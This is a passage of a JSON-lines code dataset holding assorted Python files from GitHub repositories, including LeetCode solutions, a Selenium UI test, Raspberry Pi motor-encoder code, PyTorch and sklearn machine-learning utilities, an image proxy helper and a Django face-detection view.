ans = 0\n for delta in self.diff.values():\n cur += delta\n ans = max(ans, cur)\n return ans\n\n# Your MyCalendarThree object will be instantiated and called as such:\n# obj = MyCalendarThree()\n# param_1 = obj.book(start,end)\n","repo_name":"lixiang2017/leetcode","sub_path":"problems/0732.0_My_Calendar_III.py","file_name":"0732.0_My_Calendar_III.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26946579220","text":"from seleniumbase import BaseCase\nimport time\n\n\nclass RecorderTests(BaseCase):\n def test_recording(self):\n self.open(\"https://test-moviltruck.azurewebsites.net/#/system/fast-booking\")\n \n self.click(\"mat-select#mat-select-1 div span span\")\n self.click(\"mat-option#mat-option-11 span\")\n self.click(\"mat-select#mat-select-2 div span span\")\n self.click(\"mat-option#mat-option-13 span\")\n #self.click('input[placeholder=\"Origen\"]')\n ButtonOrigen = '/html/body/app-root/body/app-header-geral/mat-drawer-container/mat-drawer-content/div/app-fast-booking/div/div[1]/div/div[3]/div/div/input'\n self.type(ButtonOrigen, \"Av. Nueva Granada, Caracas, Distrito Capital, Venezuela\")\n self.type('input[placeholder=\"Destino\"]', \"Av. Loira Arriba, Caracas 1020, Distrito Capital, Venezuela\")\n self.click('input[placeholder=\"No tenemos nada que mostrar\"]')\n self.click('button[aria-label=\"Next month\"]')\n self.click('button[aria-label=\"Next month\"]')\n self.click('button[aria-label=\"Next month\"]')\n self.click('button[aria-label=\"Next month\"]')\n self.click('button[aria-label=\"Next month\"]')\n self.click('button[aria-label=\"Next month\"]')\n self.click('td[aria-label=\"12 de diciembre de 2022\"] span')\n self.click(\"app-fast-booking.ng-star-inserted div div:nth-of-type(6) button mat-icon\")\n time.sleep(6)\n","repo_name":"jormarsikiu/AutomatizacionUIMovilTruck","sub_path":"UI_test/recordings/busca1.py","file_name":"busca1.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73964613361","text":"#! /usr/bin/env python3\nimport threading\nfrom time import sleep\nfrom gpiozero import PhaseEnableMotor\nfrom gpiozero import DigitalInputDevice\n\nmotor = PhaseEnableMotor(16,12) # USED BROADCOM ADDRESSING\n\ndef encoders(motor):\n rot_enc1 = DigitalInputDevice(7)\n rot_enc2 = DigitalInputDevice(8)\n rot_enc3 = DigitalInputDevice(25)\n rot_enc4 = DigitalInputDevice(24)\n enc_1_ticks = 0\n enc_2_ticks = 0\n enc_3_ticks = 0\n enc_4_ticks = 0\n enc_1_value = 0\n enc_2_value = 0\n enc_3_value = 0\n enc_4_value = 0\n prev_tick_1 = 0\n prev_tick_2 = 0\n prev_tick_3 = 0\n prev_tick_4 = 0\n first_tick = True\n\n while encoder_start_flag.is_set() == True:\n while motor_moving_flag.is_set() == True:\n # This part of the code reads the changes in the encoder. \n # Im only using 1 pin instead of 2 pins per encoder to save on CPU usage\n # It should still give us 32*30 = 960 ticks per rotation of accuracy which equivalates\n # to(2*pi*25mm) / 960 ticks = 0.1636246mm per tick of precision. This means each tick is\n # a little over 0.16mm\n if first_tick == True: # first iteration\n first_tick = False \n prev_tick_1 = rot_enc1.value # reads GPIO pin 7\n prev_tick_2 = rot_enc2.value # reads GPIO pin 8\n prev_tick_3 = rot_enc3.value # reads GPIO pin 25\n prev_tick_4 = rot_enc4.value # reads GPIO pin 24\n if motor.value > 0: # makes sure motor is moving forward\n enc_1_ticks = enc_1_ticks + 1 # adds 1 to start always because there is no prev tick yet\n enc_2_ticks = enc_2_ticks + 1 # adds 1 to start always because there is no prev tick yet\n enc_3_ticks = enc_3_ticks + 1 # adds 1 to start always because there is no prev tick yet\n enc_4_ticks = enc_4_ticks + 1 # adds 1 to start always because there is no prev tick yet\n\n else: # every iteration after first\n # first encoder\n enc_1_value = rot_enc1.value # reads GPIO pin 7 for rotary encoder level\n if enc_1_value != prev_tick_1: # if the prev level and current are different(meaning it changed)\n if motor.value > 0: # moving forward\n enc_1_ticks = enc_1_ticks + 1 # increment ticks(forward)\n elif motor.value < 0: # moving backward\n enc_1_ticks = enc_1_ticks - 1 #decrement ticks(backward)\n else:\n print(\"Stopped!\")\n prev_tick_1 = enc_1_value # last value = current value\n # second encoder \n enc_2_value = rot_enc2.value # reads GPIO pin 8 for rotary encoder level\n if enc_2_value != prev_tick_2: # if the prev level and current are different(meaning it changed)\n if motor.value > 0: # moving forward\n enc_2_ticks = enc_2_ticks + 1 # increment ticks(forward)\n elif motor.value < 0: # moving backward\n enc_2_ticks = enc_2_ticks - 1 #decrement ticks(backward)\n else:\n print(\"Stopped!\")\n prev_tick_2 = enc_2_value # last value = current value\n '''\n # third encoder\n enc_3_value = rot_enc3.value # reads GPIO pin 25 for rotary encoder level\n if enc_3_value != prev_tick_3: # if the prev level and current are different(meaning it changed)\n if motor.value > 0: # moving forward\n enc_3_ticks = enc_3_ticks + 1 # increment ticks(forward)\n elif motor.value < 0: # moving backward\n enc_3_ticks = enc_3_ticks - 1 #decrement ticks(backward)\n else:\n print(\"Stopped!\")\n prev_tick_3 = enc_3_value # last value = current value\n\n # fourth encoder\n enc_4_value = rot_enc4.value # reads GPIO pin 24 for rotary encoder level\n if enc_4_value != prev_tick_4: # if the prev level and current are different(meaning it changed)\n if motor.value > 0: # moving forward\n enc_4_ticks = enc_4_ticks + 1 # increment ticks(forward)\n elif motor.value < 0: # moving backward\n enc_4_ticks = enc_4_ticks - 1 #decrement ticks(backward)\n else:\n print(\"Stopped!\")\n prev_tick_4 = enc_4_value # last value = current value\n '''\n print(\"Total counted encoder 1 ticks: \",enc_1_ticks)\n print(\"Total counted encoder 2 ticks: \",enc_2_ticks)\n #print(\"Total counted encoder 3 ticks: \",enc_3_ticks)\n #print(\"Total counted encoder 4 ticks: \",enc_4_ticks)\n print(\"Exiting Encoder Thread!\")\n\ndef main(motor):\n encoder_start_flag.set()\n motor.forward(0.1)\n motor_moving_flag.set()\n print(\"Motor started!\")\n sleep(4)\n motor.stop()\n motor_moving_flag.clear()\n encoder_start_flag.clear()\n \n\nif __name__ == \"__main__\":\n\n encoder_start_flag = threading.Event() # flag for encoder thread\n motor_moving_flag = threading.Event() #flag for encoder thread\n\n encoder_thread = threading.Thread(target=encoders,args=(motor,))\n main_thread = threading.Thread(target=main,args=(motor,))\n encoder_thread.start()\n main_thread.start()\n\n main_thread.join()\n encoder_thread.join()\n\n motor.stop()\n","repo_name":"Brett7047/pipe_robot","sub_path":"test_scripts/garbage.py","file_name":"garbage.py","file_ext":"py","file_size_in_byte":5656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19298632153","text":"import os\nimport numpy as np\nimport torch\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nimport data_loader\n\n\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',\n]\n\n\ndef is_image_file(filename):\n return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)\n\n\ndef make_dataset(dir):\n images = []\n dir = os.path.expanduser(dir)\n d = dir\n\n for root, _, fnames in sorted(os.walk(d)):\n for fname in sorted(fnames):\n if is_image_file(fname):\n path = os.path.join(root, fname)\n images.append(path)\n return images\n\n\nclass RGBDFolder(data.Dataset):\n\n def __init__(\n self,\n root,\n root_depth,\n transform_rgb=None,\n transform_depth=None,\n transform_mutual=None,\n loader_rgb=data_loader.pil_loader,\n loader_depth=data_loader.torch_tensor_loader\n ):\n imgs = make_dataset(root)\n if len(imgs) == 0:\n raise(\n RuntimeError(\n \"Found 0 images in subfolders of: \"+root+\"\\n\"\n \"Supported image extensions are: \"+\",\".join(IMG_EXTENSIONS)\n )\n )\n\n if not root_depth.endswith('/'):\n root_depth += '/'\n\n self.root = root\n self.root_depth = root_depth\n self.imgs = imgs\n\n self.transform_rgb = transform_rgb\n self.transform_depth = transform_depth\n self.transform_mutual = transform_mutual\n\n self.loader_rgb = loader_rgb\n self.loader_depth = loader_depth\n return\n\n def __getitem__(self, index=0):\n # load rgb images\n path_rgb = self.imgs[index]\n img = self.loader_rgb(path_rgb)\n\n # perform transforms on original rgb image\n if self.transform_rgb is not None:\n if self.transform_mutual is not None:\n img, img_disp = self.transform_rgb(img, self.transform_mutual)\n else:\n img_disp = torch.from_numpy(np.transpose(img, [2, 0, 1]))\n img = self.transform_rgb(img)\n\n # load depth map and perform transforms on it\n path_depth = self.root_depth\n path_depth += str(int(path_rgb[len(path_rgb)-9:len(path_rgb)-4]))\n path_depth += '.pth'\n depth = self.loader_depth(path_depth)\n if self.transform_depth is not None:\n if self.transform_mutual is not None:\n depth = self.transform_depth(depth, self.transform_mutual)\n else:\n depth = self.transform_depth(depth)\n\n return img, depth, img_disp\n\n def __len__(self):\n return len(self.imgs)\n","repo_name":"Allchen/FCRN-PyTorch","sub_path":"rgbd.py","file_name":"rgbd.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"32837789511","text":"import pandas as pd\nfrom datetime import datetime\nfrom typing import Tuple, Union, List\nimport numpy as np\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom joblib import dump, load\n\nfrom sklearn.metrics import confusion_matrix, classification_report\n\nclass DelayModel:\n\n def __init__(\n self\n ):\n self._model = None # Model should be saved in this attribute.\n self.top_10_features = [\n \"OPERA_Latin American Wings\",\n \"MES_7\",\n \"MES_10\",\n \"OPERA_Grupo LATAM\",\n \"MES_12\",\n \"TIPOVUELO_I\",\n \"MES_4\",\n \"MES_11\",\n \"OPERA_Sky Airline\",\n \"OPERA_Copa Air\"\n ]\n\n @staticmethod\n def _get_period_day(date: str) -> str:\n date_time = datetime.strptime(date, '%Y-%m-%d %H:%M:%S').time()\n morning_min = datetime.strptime(\"05:00\", '%H:%M').time()\n morning_max = datetime.strptime(\"11:59\", '%H:%M').time()\n afternoon_min = datetime.strptime(\"12:00\", '%H:%M').time()\n afternoon_max = datetime.strptime(\"18:59\", '%H:%M').time()\n evening_min = datetime.strptime(\"19:00\", '%H:%M').time()\n evening_max = datetime.strptime(\"23:59\", '%H:%M').time()\n night_min = datetime.strptime(\"00:00\", '%H:%M').time()\n night_max = datetime.strptime(\"4:59\", '%H:%M').time()\n\n if (date_time > morning_min and date_time < morning_max):\n return 'mañana'\n elif (date_time > afternoon_min and date_time < afternoon_max):\n return 'tarde'\n elif (\n (date_time > evening_min and date_time < evening_max) or\n (date_time > night_min and date_time < night_max)\n ):\n return 'noche'\n\n @staticmethod\n def _is_high_season(fecha: str) -> int:\n fecha_año = int(fecha.split('-')[0])\n fecha = datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')\n range1_min = datetime.strptime('15-Dec', '%d-%b').replace(year=fecha_año)\n range1_max = datetime.strptime('31-Dec', '%d-%b').replace(year=fecha_año)\n range2_min = datetime.strptime('1-Jan', '%d-%b').replace(year=fecha_año)\n range2_max = datetime.strptime('3-Mar', '%d-%b').replace(year=fecha_año)\n range3_min = datetime.strptime('15-Jul', '%d-%b').replace(year=fecha_año)\n range3_max = datetime.strptime('31-Jul', '%d-%b').replace(year=fecha_año)\n range4_min = datetime.strptime('11-Sep', '%d-%b').replace(year=fecha_año)\n range4_max = datetime.strptime('30-Sep', '%d-%b').replace(year=fecha_año)\n\n if ((fecha >= range1_min and fecha <= range1_max) or\n (fecha >= range2_min and fecha <= range2_max) or\n (fecha >= range3_min and fecha <= range3_max) or\n (fecha >= range4_min and fecha <= range4_max)):\n return 1\n else:\n return 0\n\n @staticmethod\n def _get_min_diff(row: pd.Series) -> float:\n fecha_o = datetime.strptime(row['Fecha-O'], '%Y-%m-%d %H:%M:%S')\n fecha_i = datetime.strptime(row['Fecha-I'], '%Y-%m-%d %H:%M:%S')\n min_diff = ((fecha_o - fecha_i).total_seconds()) / 60\n return min_diff\n\n def preprocess(\n self,\n data: pd.DataFrame,\n target_column: str = None\n ) -> Union[Tuple[pd.DataFrame, pd.DataFrame], pd.DataFrame]:\n \"\"\"\n Prepare raw data for training or predict\n\n Args:\n data (pd.DataFrame): raw data.\n target_column (str, optional): if set, the target is returned.\n\n Returns:\n Tuple[pd.DataFrame, pd.DataFrame]: features and target.\n or\n pd.DataFrame: features.\n \"\"\"\n data['period_day'] = data['Fecha-I'].apply(self._get_period_day)\n data['high_season'] = data['Fecha-I'].apply(self._is_high_season)\n data['min_diff'] = data.apply(self._get_min_diff, axis=1)\n threshold_in_minutes = 15\n data['delay'] = np.where(data['min_diff'] > threshold_in_minutes, 1, 0)\n\n features = pd.concat([\n pd.get_dummies(data['OPERA'], prefix='OPERA'),\n pd.get_dummies(data['TIPOVUELO'], prefix='TIPOVUELO'),\n pd.get_dummies(data['MES'], prefix='MES')\n ], axis=1)\n\n if target_column:\n target = pd.DataFrame(data[target_column])\n\n return features[self.top_10_features], target\n\n for col in self.top_10_features:\n if col not in features.columns:\n features[col] = 0\n features = features[self.top_10_features]\n\n return features[self.top_10_features]\n\n def fit(\n self,\n features: pd.DataFrame,\n target: pd.DataFrame\n ) -> None:\n \"\"\"\n Fit model with preprocessed data.\n\n Args:\n features (pd.DataFrame): preprocessed data.\n target (pd.DataFrame): target.\n \"\"\"\n\n x_train, x_test, y_train, y_test = train_test_split(\n features,\n target['delay'],\n test_size=0.33,\n random_state=42,\n shuffle=True\n )\n\n # Get weights for the classes\n n_y0 = len(y_train[y_train == 0])\n n_y1 = len(y_train[y_train == 1])\n\n # Train logistic regression model\n self._model = LogisticRegression(\n class_weight={1: n_y0 / len(y_train), 0: n_y1 / len(y_train)}\n )\n self._model.fit(x_train, y_train.values.ravel())\n\n result = self._model.predict(x_test)\n print(confusion_matrix(y_test, result))\n\n dump(self._model, 'logistic_regression_model.joblib')\n\n\n def predict(\n self,\n features: pd.DataFrame\n ) -> List[int]:\n \"\"\"\n Predict delays for new flights.\n\n Args:\n features (pd.DataFrame): preprocessed data.\n \n Returns:\n (List[int]): predicted targets.\n \"\"\"\n if self._model is None:\n current_dir = os.path.dirname(os.path.abspath(__file__))\n data_path = os.path.join(current_dir, 'logistic_regression_model.joblib')\n self._model = load(data_path)\n\n x_to_predict = features[self.top_10_features]\n predictions = self._model.predict(x_to_predict)\n\n return predictions.tolist()\n","repo_name":"afescobar94/latam","sub_path":"challenge/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1319420125","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nfrom collections import deque\n\nclass Solution:\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\n A = []\n if not root: return A\n \n D = deque([root])\n \n while len(D):\n L = []\n for _ in range(len(D)):\n node = D.popleft()\n L.append(node.val)\n if node.left: D.append(node.left)\n if node.right: D.append(node.right)\n A.append(L)\n return A \n \n \n ","repo_name":"sbeignez/LeetCode","sub_path":"binary-tree-level-order-traversal/binary-tree-level-order-traversal.py","file_name":"binary-tree-level-order-traversal.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25634843839","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().system('pip install opencv-python')\nimport cv2\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\n\npath = os.getcwd()\n#print(path)\nfilepath = path+r\"\\Pictures\\anime-faces\\data\"\nprint(filepath)\n\ntest = cv2.imread(filepath+r'\\1.png') \n\n\n# In[3]:\n\n\n#test\n\n\n# In[4]:\n\n\ndata = []\nfor i in range(21551):\n data.append(cv2.imread(filepath + r'\\%s.png'%(i+1)))\n\n\n# In[8]:\n\n\nplt.imshow(data[0][:,:,::-1])\n\n\n# In[ ]:\n\n\ndata = np.array(data)\n\n\n# In[ ]:\n\n\ndata.shape\n\n\n# In[ ]:\n\n\nnp.save('hw2_2',data)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"yuping1624/1082NCTU-Deep-Learning","sub_path":"Homework2/HW2-2_0852617_曾鈺評_preprocessing.py","file_name":"HW2-2_0852617_曾鈺評_preprocessing.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4954056581","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.metrics import auc, make_scorer, plot_confusion_matrix, plot_roc_curve, roc_auc_score\nfrom sklearn.model_selection import cross_validate, StratifiedKFold, StratifiedShuffleSplit\n\nfrom datareader import get_credit_card_xy, get_dataset_train_test, get_heart_xy, RANDOM_STATE, save_figure\nfrom trainer import TRAIN_SIZE\n\n\ndef plot_clf_confusion_mat(clf, x_test, y_test, clf_name, dataset_name, labels):\n print(\"\\tGenerating Confusion matrix...\")\n fig, ax = plt.subplots()\n plot_confusion_matrix(clf,\n x_test,\n y_test,\n display_labels=labels,\n normalize=\"true\",\n ax=ax,\n cmap=plt.get_cmap(\"Blues\"))\n\n save_figure(fig, clf_name, dataset_name, \"confusion_matrix\")\n\n\ndef plot_cross_val_roc_curves(clf, x, y, clf_name, dataset_name):\n print(\"\\tGenerating AUC_ROC curves over cross validation...\")\n cv = StratifiedKFold(n_splits=6)\n\n tprs = []\n aucs = []\n mean_fpr = np.linspace(0, 1, 100)\n\n fig, ax = plt.subplots()\n for i, (train, test) in enumerate(cv.split(x, y)):\n clf.fit(x[train], y[train])\n viz = plot_roc_curve(clf, x[test], y[test],\n name='ROC fold {}'.format(i),\n alpha=0.3, lw=1, ax=ax)\n interp_tpr = np.interp(mean_fpr, viz.fpr, viz.tpr)\n interp_tpr[0] = 0.0\n tprs.append(interp_tpr)\n aucs.append(viz.roc_auc)\n\n ax.plot([0, 1], [0, 1], linestyle='--', lw=2, color='r', alpha=.8)\n\n mean_tpr = np.mean(tprs, axis=0)\n mean_tpr[-1] = 1.0\n mean_auc = auc(mean_fpr, mean_tpr)\n std_auc = np.std(aucs)\n ax.plot(mean_fpr, mean_tpr, color='b',\n label=r'Mean ROC (AUC = %0.2f $\\pm$ %0.2f)' % (mean_auc, std_auc),\n lw=2, alpha=.8)\n\n std_tpr = np.std(tprs, axis=0)\n tprs_upper = np.minimum(mean_tpr + std_tpr, 1)\n tprs_lower = np.maximum(mean_tpr - std_tpr, 0)\n ax.fill_between(mean_fpr, tprs_lower, tprs_upper, color='grey', alpha=.2,\n label=r'$\\pm$ 1 std. dev.')\n\n ax.set(xlim=[-0.05, 1.05], ylim=[-0.05, 1.05])\n ax.legend(loc=\"lower right\")\n\n save_figure(fig, clf_name, dataset_name, \"roc_auc_cv\")\n\n\ndef cross_validate_and_analyze(clf,\n x_train,\n x_test,\n y_train,\n y_test,\n clf_name,\n dataset_name,\n labels,\n scoring=make_scorer(roc_auc_score)):\n plot_cross_val_roc_curves(clf, x_train, y_train, clf_name, dataset_name)\n\n train_scores = cross_validate(\n clf,\n x_train,\n y_train,\n scoring=scoring,\n n_jobs=-1,\n return_train_score=True,\n return_estimator=True)\n best_clf = train_scores['estimator'][train_scores['test_score'].argmax()]\n\n plot_clf_confusion_mat(best_clf,\n x_test,\n y_test,\n clf_name=clf_name,\n dataset_name=dataset_name,\n labels=labels)\n\n\ndef plot_performance_vs_train_size(dataset_name,\n clf_name,\n clf,\n data_preprocessor=None,\n scoring=make_scorer(roc_auc_score),\n train_max=0.9):\n print(\"\\tPerformance VS Train Size...\")\n if dataset_name == \"heart\":\n x, y = get_heart_xy(data_preprocessor)\n elif dataset_name == \"credit_card\":\n x, y = get_credit_card_xy(data_preprocessor)\n else:\n assert False\n\n fig, ax = plt.subplots()\n\n train_scores = []\n test_scores = []\n steps = 10\n a_min = 0.1\n step_size = (train_max - a_min) / steps\n train_sizes = np.arange(a_min, train_max, step_size)\n for train_size in train_sizes:\n print(\"\\t\\tTrain size: {}\".format(train_size, ))\n ss = StratifiedShuffleSplit(train_size=train_size,\n n_splits=15,\n random_state=RANDOM_STATE)\n scores = cross_validate(\n clf,\n x,\n y,\n scoring=scoring,\n cv=ss.split(x, y),\n n_jobs=-1,\n return_train_score=True,\n return_estimator=False)\n\n avg_train = np.mean(scores[\"train_score\"])\n train_scores.append(avg_train)\n avg_test = np.mean(scores[\"test_score\"])\n test_scores.append(avg_test)\n\n ax.plot(train_sizes, train_scores, lw=2, color='b', label=\"train scores\")\n ax.plot(train_sizes, test_scores, lw=2, color='r', label=\"test scores\")\n\n ax.legend(loc=\"lower right\")\n\n save_figure(fig, clf_name, dataset_name, \"score_vs_train_size\")\n\n\ndef analyze_clf(dataset_name,\n clf_name,\n labels,\n clf,\n train_size=TRAIN_SIZE,\n data_preprocessor=None,\n train_max=0.9):\n\n plot_performance_vs_train_size(dataset_name,\n clf_name,\n clf,\n data_preprocessor,\n train_max=train_max)\n\n x_train, x_test, y_train, y_test = get_dataset_train_test(dataset_name,\n train_size=train_size,\n random_state=RANDOM_STATE,\n data_preprocessor=data_preprocessor)\n cross_validate_and_analyze(\n clf,\n x_train,\n x_test,\n y_train,\n y_test,\n clf_name=clf_name,\n dataset_name=dataset_name,\n labels=labels,\n scoring=make_scorer(roc_auc_score)\n )\n","repo_name":"macnb9/p1_supervised_learning","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":6060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14184218691","text":"'''\nBFS\n\nRuntime: 213 ms, faster than 14.19% of Python3 online submissions for Word Ladder II.\nMemory Usage: 14.6 MB, less than 71.47% of Python3 online submissions for Word Ladder II.\n\n2022-08-14 测试用例增强了, 现在会 TLE\n'''\nclass Solution:\n def findLadders(self, beginWord: str, endWord: str, wordList: List[str]) -> List[List[str]]:\n word_set = set()\n for word in wordList:\n word_set.add(word)\n if endWord not in word_set:\n return []\n \n q = deque([ [beginWord, [beginWord]] ]) \n l = len(beginWord)\n seen = set([beginWord])\n while q:\n next_q = deque()\n ans = []\n visited = seen.copy()\n for word, arr in q:\n for i in range(l):\n for low in string.ascii_lowercase:\n com = word[: i] + low + word[i + 1: ]\n if com in word_set:\n if com == endWord:\n ans.append(arr + [com])\n else:\n if com not in visited:\n next_q.append([com, arr + [com]])\n seen.add(com)\n if ans:\n return ans\n else:\n q = next_q\n\n return [] \n\n\n\n'''\n先使用 BFS 找到最短路径的长度,再使用 DFS + memo 寻找路径。\n\nRuntime: 246 ms, faster than 20.77% of Python3 online submissions for Word Ladder II.\nMemory Usage: 18.8 MB, less than 6.57% of Python3 online submissions for Word Ladder II.\n'''\nclass Solution:\n def findLadders(self, beginWord: str, endWord: str, wordList: List[str]) -> List[List[str]]:\n words = set(wordList)\n if endWord not in words:\n return []\n\n graph = defaultdict(list)\n for w in wordList:\n for i in range(len(w)):\n key = w[: i] + '?' + w[i + 1: ]\n graph[key].append(w)\n\n def depth() -> int:\n d = 0\n seen = {beginWord}\n q = deque([beginWord])\n while q:\n for _ in range(len(q)):\n w = q.popleft()\n for i in range(len(w)):\n key = w[: i] + '?' + w[i + 1: ]\n for neigh in graph[key]:\n if neigh == endWord:\n return d + 1\n if neigh not in seen:\n seen.add(neigh)\n q.append(neigh)\n d += 1\n return -1\n\n d = depth()\n if -1 == d:\n return []\n\n @lru_cache(None)\n def walk(word, d):\n if 0 == d:\n if word == endWord:\n return [[endWord]]\n return []\n\n result = []\n for i in range(len(word)):\n key = word[: i] + '?' + word[i + 1: ]\n for neigh in graph[key]:\n paths = walk(neigh, d - 1)\n result += [[word] + path for path in paths]\n return result \n\n return walk(beginWord, d)\n\n\n","repo_name":"lixiang2017/leetcode","sub_path":"problems/0126.0_Word_Ladder_II.py","file_name":"0126.0_Word_Ladder_II.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3326797573","text":"import requests\nfrom flask import send_file\nfrom PIL import Image\nimport os\n\n\ndef download_image(url, file_path):\n # Send a GET request to the specified URL and save the image to the file path\n response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'}, stream=True)\n \n if response.status_code == 200:\n with open(file_path, 'wb') as file:\n for chunk in response.iter_content(chunk_size=1024):\n if chunk:\n file.write(chunk)\n else:\n raise Exception('Failed to fetch the image')\n\n\ndef get_file_response(file_path):\n # Return the file as a Flask send_file response if it exists\n if os.path.exists(file_path):\n return send_file(file_path, mimetype='image/jpeg')\n return None\n\n\ndef resize_image(original_path, resized_path, width, height):\n # Open the original image, resize it, and save the resized image to the specified path\n with Image.open(original_path) as image:\n resized_image = image.resize((width, height))\n resized_image.save(resized_path, \"JPEG\")\n","repo_name":"cookin404/image-proxy-server","sub_path":"Utils/image_utils.py","file_name":"image_utils.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31288389930","text":"\"\"\"Installation script for the 'isaacgymenvs' python package.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nfrom setuptools import setup, find_packages\n\nimport os\n\nroot_dir = os.path.dirname(os.path.realpath(__file__))\n\n\n# Minimum dependencies required prior to installation\nINSTALL_REQUIRES = [\n # RL\n \"gym\",\n \"torch\",\n \"matplotlib==3.5.1\",\n \"tb-nightly\",\n \"tqdm\",\n \"ipdb\",\n # \"sklearn\",\n # \"tensorboardX\",\n # meta\n \"dowel\",\n \"akro\"\n]\n\n# Installation operation\nsetup(\n name=\"seqdex\",\n author=\"\",\n version=\"0.1.0\",\n description=\"Chaining Dexterous Policies for Long-Horizon Manipulation.\",\n keywords=[\"robotics\", \"rl\"],\n include_package_data=True,\n install_requires=INSTALL_REQUIRES,\n packages=find_packages(\".\"),\n classifiers=[\"Natural Language :: English\", \"Programming Language :: Python :: 3.7\"],\n zip_safe=False,\n)\n\n# EOF\n","repo_name":"Skeli9989/SeqDex","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"2690504904","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\n\nfrom .utils import *\nimport base64\nimport time\n# Create your views here.\n\n\ndef IndexView(request):\n\n return render(request, \"portal/index.html\")\n\ndef FaceDetectionView(request):\n \n epoch = str(time.time())\n if request.method != \"POST\":\n return HttpResponse(\"Only POST Requests Accepted\")\n\n if \"image\" in request.POST:\n with open(\"temp/%s.png\"%(epoch), \"wb\") as fh:\n img = request.POST.get('image')\n \n missing_padding = len(img) % 4\n if missing_padding != 0:\n img += '='* (4 - missing_padding)\n \n fh.write(base64.b64decode(img))\n\n f = FaceRecogniser()\n if not f:\n return HttpResponse(\"Error!\")\n \n face = f.detect_face(f.process_image(\"temp/%s.png\"%epoch))\n\n if face == -1 or face == -2:\n return JsonResponse({\"status\": False, \"msg\": \"No/Multiple Face Datected!\"})\n \n return JsonResponse({\"status\": True})\n","repo_name":"aakankshax/stacksfx","sub_path":"portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70464573684","text":"import os\nimport os.path as op\nimport files\nimport pandas as pd\n\n\ndef secondary_prompt(subject_id, output_folder):\n all_the_files = files.get_files(output_folder, \"block\", \".csv\")[2]\n all_the_files.sort()\n try:\n last_file = all_the_files[-1]\n dem_data = pd.read_csv(last_file)\n age_prev = dem_data.age.unique()[0]\n gender_prev = dem_data.gender.unique()[0]\n block_prev = dem_data.block.unique()[0]\n exp_info = {\n \"ID (sub-xxx)\": subject_id,\n \"age\": age_prev,\n \"gender (m/f/o)\": gender_prev,\n \"block\": block_prev + 1\n }\n return exp_info\n except:\n exp_info = {\n \"ID (sub-xxx)\": subject_id,\n \"age\": \"ADD_AGE\",\n \"gender (m/f/o)\": \"ADD_GENDER\",\n \"block\": 0\n }\n return exp_info\n","repo_name":"maciekszul/DANC_EXP_grasp_change","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71236021363","text":"# this script has an `format` argument\n# pylint: disable=redefined-builtin\n\"\"\"\n Generic method to handle conversion failures ans still return something to use\n to explain what when wrong, etc.\n\"\"\"\nVALID_IMAGE_FORMAT_LIST = ('jpg', 'jpeg', 'png', 'gif', 'pnm', 'ppm', 'tiff')\n\n# some good defaults\nmimetype = \"text/plain\"\ndata = \"Conversion failure\"\n\nif format in VALID_IMAGE_FORMAT_LIST:\n # default image is an OFSImage so even if conversion engine is down\n # we are still able to deliver it\n default_image = getattr(context, \"default_conversion_failure_image\", None)\n if default_image is not None:\n mimetype = default_image.getContentType()\n data = default_image.index_html(context.REQUEST, context.REQUEST.RESPONSE)\n\nreturn mimetype, data\n","repo_name":"Nexedi/erp5","sub_path":"bt5/erp5_dms/SkinTemplateItem/portal_skins/erp5_dms/Document_getFailsafeConversion.py","file_name":"Document_getFailsafeConversion.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} 